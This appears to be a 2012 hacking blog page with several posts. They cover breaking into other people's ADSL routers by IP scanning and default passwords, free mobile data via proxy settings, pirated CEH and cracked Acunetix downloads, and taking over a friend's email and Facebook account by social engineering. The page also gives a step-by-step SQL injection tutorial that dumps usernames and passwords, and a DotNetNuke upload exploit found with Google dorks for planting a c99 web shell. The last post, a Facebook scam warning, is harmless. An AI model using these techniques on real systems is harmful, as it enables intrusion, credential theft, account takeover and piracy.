Welcome everybody, Pliz use the chat bar to communicate with us directly and chat with your friends. Keep in touch with us. Thank you
Showing posts with label HACKING. Show all posts
Showing posts with label HACKING. Show all posts

Saturday, 1 September 2012

How to hack into broadband adsl modem router and get the broadband user id and password


Don’t  be excited now I am gonna show you a important topic......thats you can hack ASDL Router or Broadband. If you have any extra creativity than sure you can find many way to hack your broadband or internet .}{}{ 



First connect to your broadband, and goto
 http://whatismyip.com to know your public IP Address.




Now you need Port Scanner software, here I used a free one from RadMIN.You may download angry ipscanner for this work.Open Port Scanner after install and type your IP Range like following figure and set port range from 80 to 81.


Hit Scan button as soon as you finish above steps.



After finish scanning you have to look for the alive IP Addresses those have port 80 opened like following figure.


Here I have found IP Address with port 80 opened. No you have to open that IP Address from internet Explorer like following figure




If everything went fine, It will ask you for user id and password, and out of 10 ADSL Router, at least 6 having default password, coz no one bother to change that default password L .


So, give it a try with following ID and Pass:

ID : admin / Pass : admin (most common)
ID : admin / Pass : admin123
ID : admin / Pass : admin321
ID : root / Pass : root
ID : root / Pass : admin
ID : admin / Pass : root

Wow!! I have got the access⦠Now I can do whatever I want. But I don't want to do anything


You can access any settings on the ADSL Router.





Now you need an Asterisk Key recovery tool to get the broadband user ID and Password. 


Here password recovered successfully in a second. 


Want to get more this type of post then saty connect with us......






How To GPRS Hack For Aircel Sim & 3G Internet Trick on 2G Sim 2012



I  have been watching these type of post since I am using Internet.Tricks for getting 3G speed on 2G plan can be seen on every second Tips and Tricks site but they Don't Confirm that Trick will work or Not.
Initially it started When BSNL 2G sim was Downloading data at speed of a 3G Network but it was the fault of BSNL administration and technical problem, Which were resolved later by BSNL now we don't get 3G speed (1-10 Mbps) on Simple 2g sim of BSNL.The Pricing of 3G data plans are touching sky, so Common men like us are forced to use slow speed (10-20 KBPS) of 2G networks.

As I did it in my recent posts I searched over the Internet for most promising posts about the 3G hacks and Tricks.So I came Across two working Tricks on two different sites Which seems legit to me.
 

As You Know if you use Aircel Connection for Internet access Aircel has a 98 Rupees Plan for Unlimited Internet access and Downloading.

Check out these two Posts about latest working Hack and Trick for 3G Aircel Network.Basically it is Hacking 3G Network from a 2G sim it is Not Necessary that you have to buy a 3G sim You can use your Normal 2G sims Trick works fine on that.Try any of These and Tell us if you Find them useful.


First Trick :
Aircel is leading GPRS and internet service provider in india.Speed of Internet is very high because Providing internet access is aircel's special service.We are posting our first aircel gprs trick by which you can use free aircel 3G internet in your mobile.We have new working proxy by which you have to make new setting and get free internet access.

#Instruction to Use

Step 1: Make new setting

  • APN:aircelwap
  • PROXY:10.4.42.15
  • PORT:80
  • HOMEPAGE:Whatever you want

 Step 2: Save settings and get free gprs on mobile.you can use this trick on PC also.justconnect your mobile and try to use it.



Second Trick :

Step 1.Create New Gprs Settings In Your Mobile Phone
Step 2.Connection Name--Aircel Free Gprs
Step 3.APN (Access point name) : aircelgprs.com
Step 4.Use Proxy --Yes Enabled
Step 5.Proxy Address--192.168.35.201
Step 6.Proxy Port --80
Step 7.Homepage--www.google.com


After Creating The Setting Switch Off Mobile Phone And Restart Again Now Go Mobile's Browser And Enjoy Free 3G Aircel Gprs at zero cost 

If you like our trick please like us on facebook  

Friday, 31 August 2012

Certified Ethical Hacker v7 Complete package



This contains the complete package to the Certified Ethical Hacker course, version 7 (the most recent at the time of this upload).  It contains the lectures (as videos), the study guide, unencrypted copies of the teacher's instructor slides, and all the programs you'll need in the course.  Note that the programs are put in ISO images.  To open the ISOs, you can either burn them to a disk and open them like any other data-containing disk, or you can open them with software such as 7-zip (which is what I prefer, because after all ISOs are only containers).  Along with the tools are animations that explain how to use them (and how to install them).  Also, just because this focuses on "ethical hacking" (or authorized hacking as I prefer to call it) doesn't mean it doesn't teach you black hat methods.

The official Certified Ethical Hacker course costs something like $500, and you can only take the exam once.  If you fail, you have to pay another $500 to retake it.  That's what this torrent is for, studying.  And its not just studying for the CEH exam, its also simply a great way to learn hacking.  Note that this course assumes you have moderate understanding of computers, a computer with Windows (the course is oriented around Windows, but if you have Linux then many of the Windows tools can be run through Wine), and plenty of time on your hands.  You do not need to be a Linux guru or have programming knowledge to learn from this course.

The course is broken up into different sections, called "modules", each teaching a slightly different subject.  The modules are:
-Module 02: Footprinting and Reconnaissance
-Module 03: Scanning Networks
-Module 04: Enumeration
-Module 05: System Hacking
-Module 06: Trojans and Backdoors
-Module 07: Viruses and Worms
-Module 08: Sniffers
-Module 09: Social Engineering
-Module 10: Denial of Service
-Module 11: Session Hijacking
-Module 12: Hacking Webserver
-Module 13: Hacking Web Applications
-Module 14: SQL Injection
-Module 15: Hacking Wireless Networks
-Module 16: Evading IDS, Firewalls, and Honeypots
-Module 17: Buffer Overflows
-Module 18: Cryptography
-Module 19: Penetration Testing


I originally found this torrent on TPB, but it was so tremendously helpful I decided to upload it elsewhere.  Enjoy this torrent, remember to seed, and get hacking!
Category:Other
Size:16.30 GB
Click to see files:
84 files


Torrent FileTorrent File
Torrent File
Direct Download
Direct Download
No client needed
Magnet Link
Magnet Link
Fast search in Other category:    

Downloaded:179 times
Info Hash:01f570c325730973138652e9d482deb1822f192f
Tracker listSeedsLeechersCompleteLast update
udp://tracker.yify-torrents.com:80/announce697316331/08/2012 17:04:13
http://tracker.ccc.de:80/announce687216231/08/2012 16:26:41
http://bt.rghost.net:80/announce677017931/08/2012 18:41:33
udp://tracker.publichd.eu/announce667316431/08/2012 18:05:10
http://tracker.yify-torrents.com:80/announce646716831/08/2012 17:27:57
http://ipv4.tracker.harry.lu/announce646017631/08/2012 16:44:28
http://tracker.publichd.eu/announce495517931/08/2012 18:10:31
http://tracker.torrentbay.to:6969/announce28331931/08/2012 17:52:55
udp://torrentbay.to:6969/announce27341731/08/2012 17:07:57
http://torrentbay.to:6969/announce26441731/08/2012 18:14:44
http://www.h33t.com:3310/announce252913931/08/2012 19:01:17
udp://fr33dom.h33t.com:3310/announce22345531/08/2012 18:28:11
http://fr33dom.h33t.com:3310/announce22295531/08/2012 19:11:05
http://torrento.net:2810/announce23531/08/2012 17:32:34
http://tracker.coppersurfer.tk:6969/announce211031/08/2012 16:09:52


sourav


thanks a trillion frnd...

Tuesday, 21 August 2012

Auto Hide IP 5.2.4.6 Mediafire full

Auto Hide IP 5.2.4.6 | 6 MB



Auto Hide IP - Hide Your IP Address, Surf Anonymously, Protect Your Identity, Guard Against Hackers. Be careful! Have you ever been aware of your IP adress? Your IP exactly points to your location, with very high precision, right to the door of your apartment. Every time you visit a website, your IP address is completely exposed.

Auto Hide IP will help you conceal your real IP and protect your identity online. You need not worry about your privacy and security any more. Browse anonymously with one click from now on.

Saturday, 18 August 2012

Hacking Facebook through Social Engineering



One the way to hack Facebook is Social Engineering, but the question asked by nearly all the people who are new to hacking scene is that "What is social Engineering and how to hack a (Facebook) account by it?"
So i decided to write this article to explain what it is and give a real life example of my own.

First lets see what Wikipedia have to say:

"Social engineering is commonly understood to mean the art of manipulating people into performing actions or divulging confidential information."


According to Hacker's Jargon Dictionary:
"Social Engineering: n. Term used among crackers and samurai for cracking

techniques that rely on weaknesses in  wetware rather than software; the aim
is to trick people into revealing passwords or other information that
compromises a target  system's security.  Classic scams include phoning up a
mark who has  the required information and posing as a field service tech or a
fellow employee with an urgent access problem. "
So actually if you trick some one to give you the confidential information he is  manipulated by you. So now its clear that our beloved Phishing is also a kind of social manipulation. This might give you the size of it!

Lets get started:


So Phishing is a way to hack and its social engineering, but what are the other ways? Well apart from this you could trick the other person to give you his password. I know this might be really difficult but once you have mastered you could really make your name. Because the most wanted hacker of all times Kevin Mithnik actually used Social manipulation to hack though he himself couldn't write his own exploit!


An easy way is to guess the password from the information given, normally people use following things as their password:


  • Date of birth
  • Surname
  • Phone Number
  • School's name
  • Girl Friend's name :)
  • Favourite Movie
  • Favourite Band
  • Favourite Hero/Heroine 
  • Favourite Fruit! (I used one when I was young!)
These are only some, but if you know the other person very well these might work!

Another idea is to manipulate the other person in giving you the Answer to their security Question! This is what I am going to cover in Real Life Example! 

"THE MAIN TRICK IS TO EXPLOIT THE TRUST BASE TO HACK!"



So it means you should exploit the trust that victim have in you to get the information, the trust could be of a friend, colleague or official (If you are pretending to be a Facebook guy who need their password).


REAL LIFE EXAMPLE:


Some months back my best friend challenged me to hack his Facebook account, unfortunately he was a reader of my blog and knew all the ways like Phishing or Keylogging. So I couldn't hack him for much time every time i tried i failed. So I though of social engineering.
What I did first was to got the primary Email Address of Facebook, I got that easily by Visiting his Profile page. The email was in Hotmail!


So I opened the Hotmail password reset page > https://account.live.com/password/reset and gave his email this gave me the following page:



Here the security Question was " Name of Best Friend from Childhood?", it seemed pretty easy so started entering the name of all his friends but to my amazement the name was someone's whom i didn't knew.

So I went to the Chat and manipulated him. Following is some text from chat:
====================================================
Me: Hello, how are you/
He: Fine. whatsup!
Me: Nothing, just getting ready for your party.
He: Ohh great, it is going to be fun!
Me: Yah i know, who else is comming?
He: Only you and [He named some which were not the answer]
Me: Hey havent you called you old friends? I wanted to meet them.
He: Nupp!!!
Me: Are in contact with them, BTW who is your best friend apart from our group?
He : Ohh my best friend apart form you people is Arslan.
Me: ohh great looking forward to the party! bye.
====================================================


So those people who don't know ARSLAN is a name and to my Good Luck it was also the password! So I hacked his email and from their I hacked his Facebook account,


Don't worry no harm was done I just showed him that i did it and returned him the account because it is unethical to hack people to harm them. Real Hackers don't do this and I for my self only hack my dearest friends (who don't mind) for fun that all for me!
So from this example you people might have learn that how easy it is to hack through Social Engineering. But ALAS! the success rate is very low, but still where nothing 
works this works!



Saturday, 11 August 2012

Acunetix Web Vulnerability Scanner Version 8 Full Cracked Mediafire Download


Acunetix Web application security has announced an updated build of Acunetix Web Vulnerability Scanner 8 (WVS 8). The new build 20120808 offers a number of new security checks for several different well known web applications, improvements and also number of bug fixes.


New Feature:
  • Acunetix WVS will alert the user if a web application firewall or IDS are detected
New Security Checks:
  • Added a security check for FCKeditor cross site scripting vulnerability
  • Added a test for Liferay json Auth Bypass
  • Acunetix WVS now checks for Server Side Request Forgery
  • Added several security checks for IBM Tivoli Access Manager Web Server vulnerabilities
  • New security check for vulnerabilities in SharePoint Could Allow Elevation of Privilege (MS12-050)
  • Acunetix WVS now checks for several DotNetNuke vulnerabilities (popular ASP.NET CMS)
  • Added a new security check for exposed Apache Solr Service
  • Remote code execution tests for Umbraco asp.net CMS software
  • Check for SWFUpload applet vulnerability in a large number of web applications
  • Added security checks for user controllable scripts and charsets
Improvement:
  • HTTP Verb Tampering security script now bruteforces common or sensitive files and directories
  • Cross-site scripting (XSS) security checks were improved
Bug fixes:
  • Fixed: Incorrect handling of Internet Explorer’s Javascript substr implementation
  • Fixed: Login Sequence Recorder; ssl_write result was not handled correctly resulting in data not rendering correctly
  • Fixed: Display problem; alert/child count was not displayed correctly in some cases
  • Fixed: Developer report was not showing long urls in coverage report
  • Fixed: Saved credentials were not persistent in general settings
  • Fixed: Product was not activating when using proxy credentials for activation

Thursday, 9 August 2012

WEBSITE HACKING

watermarked-computer-virus 

 

SQL Injection in MySQL Databases:-

SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial i will be showing you the steps to carry out the attack on a MySQL Database.

Step 1:
When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this:
www.site.com/page=1

or
www.site.com/id=5

Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ' after the number in the url. For example:

www.site.com/page=1'

If the database is vulnerable, the page will spit out a MySQL error such as;

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29

If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection.

Step 2

Now we need to find the number of union columns in the database. We do this using the "order by" command. We do this by entering "order by 1--", "order by 2--" and so on until we receive a page error. For example:

www.site.com/page=1 order by 1--
http://www.site.com/page=1 order by 2--
http://www.site.com/page=1 order by 3--
http://www.site.com/page=1 order by 4--
http://www.site.com/page=1 order by 5--

If we receive another MySQL error here, then that means we have 4 columns. If the site errored on "order by 9" then we would have 8 columns. If this does not work, instead of -- after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It just depends on the way the database is configured as to which prefix is used.

Step 3

We now are going to use the "union" command to find the vulnerable columns. So we enter after the url, union all select (number of columns)--,
for example:
www.site.com/page=1 union all select 1,2,3,4--

This is what we would enter if we have 4 columns. If you have 7 columns you would put,union all select 1,2,3,4,5,6,7-- If this is done successfully the page should show a couple of numbers somewhere on the page. For example, 2 and 3. This means columns 2 and 3 are vulnerable.

Step 4

We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:
user()
database()
version()
or if these dont work try...
@@user
@@version
@@database

For example the url would look like:
www.site.com/page=1 union all select 1,user(),version(),4--

The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.
IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this.

Step 5

In this step our aim is to list all the table names in the database. To do this we enter the following command after the url.
UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
So the url would look like:
www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--

Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables.

Step 6
In this Step we want to list all the column names in the database, to do this we use the following command:

union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password.

Step 7

Finally we need to dump the data, so say we want to get the "username" and "password" fields, from table "admin" we would use the following command,
union all select 1,2,group_concat(username,0x3a,password),4 from admin--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin--

Here the "concat" command matches up the username with the password so you dont have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website

Portal Hacking (DNN) Technique:-

       One more hacking method called "Portal Hacking (DNN)". This method also uses in google search engine to find hackable sites.. Here U can use only Google Dorks for
hacking a websites..

Here U can use dez two Google Dorks

1- inurl:"/portals/0"

2- inurl:/tabid/36/language/en-US/Default.aspx

You can also modify this google dork according to your need & requirement

Here is the exploit
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Step 1 :
http://www.google.com

Step 2:
Now enter this dork
:inurl:/tabid/36/language/en-US/Default.aspx
this is a dork to find the Portal Vulnerable sites, use it wisely.

Step 3:
you will find many sites, Select the site which you are comfortable with.

Step 4:
For example take this site.

http://www.abc.com/Home/tabid/36/Lan...S/Default.aspx

Step 5: Now replace
/Home/tabid/36/Language/en-US/Default.aspx

with this
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

 

3

 

Step 6: You will get a Link Gallary page.So far so good!

Step 7: Dont do anything for now,wait for the next step...

Step 8: Now replace the URL in the address bar with a Simple Script

javascript:__doPostBack('ctlURL$cmdUpload','')

Step 9: You will Find the Upload Option

 

4

 

Step 10:
Select Root

Step 11:
Upload your package Your Shell c99,c100 , Images, etc

After running this JAVA script, you will see the option for Upload Selected File Now select you page file which you have  & upload here.
Now  Go to main page and refresh. you have seen hacked the website.

Done..!!

Blogger Labels: WEBSITE,Injection,MySQL,Databases,injections,database,layer,techniques,Oracle,tutorial,Step,vulnerabilities,Once,example,error,argument,resource,columns,difference,version,user,column,admin,IMPORTANT,UNION,SELECT,FROM,Remember,information,passwords,member,password,data,Here,Portal,Technique,method,engine,Google,Dorks,portals,Default,requirement,Providers,HtmlEditorProviders,Vulnerable,Home,Language,Link,Gallary,Dont,Simple,Script,__doPostBack,Find,Upload,Option,Root,Shell,Images,JAVA,File,Penulis,table_name,information_schema,group_concat,column_name,table_schema,username,inurl,tabid,aspx,dork,fcklinkgallery

3 most well-known frauds on Facebook or myspace you should be careful !

3-most-popular-facebook-scams1

 

IN BRIEF-

▶Like Scams: where you “like” the web page only to find nothing existing on it. Scammers advantage from guests.

▶Survey Scams: you finish online internet surveys and fraudsters again advantage.

▶Fake Applications Scam: allow legal programs to pick up your private details.

New scammers area almost daily and sweep across a huge variety of details on Facebook or myspace or fb.

Here are 3 most well-known scammers you should beware:

1>Like Scams:
Here, the fraudsters set up a web page guaranteeing a interest looking for story, like “LOL This woman gets OWNED after a POLICE OFFICER moves her STATUS MESSAGE.” Then they strategy a huge variety of clients and their friends into “liking” the web page, which really has nothing.  Scammers advantage from the guests .

2>Survey Scams:
Similar to like scams, a super-juicy review is assured like “OMG! Look what this kid did to his university after being expelled!”. You have to “like” the web page and finish a fast research before learning the story. Know what! You just offered fraudsters a commission transaction payment for posting the research, and served the scams distribute by posting it to all your friends.

3>Fake Applications Scam:

Some third-party legal programs pick up your details when you allow them to accessibility your details. Some other individuals like “Want to see who regarded your profile?” scams you through online internet surveys. One can never really know who regarded your profile! But that has not stopped fraudsters from creating fake programs that make believe that to let you see that is confirming you out on Facebook or myspace or fb. Instead, the programs just provide you to a research, and immediately development a weblink to all your friends. Scammers advantage again.

So next time you see such things on Facebook or myspace or fb, do not ever simply select them!

Blogger Labels: frauds,Facebook,BRIEF,Scams,Scammers,advantage,guests,Survey,fraudsters,Fake,Applications,Scam,area,Here,woman,POLICE,OFFICER,STATUS,MESSAGE,strategy,clients,Similar,Look,transaction,payment,Some,individuals,Want,Instead,development,myspace,internet

Related Posts Plugin for WordPress, Blogger...

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Blogger Templates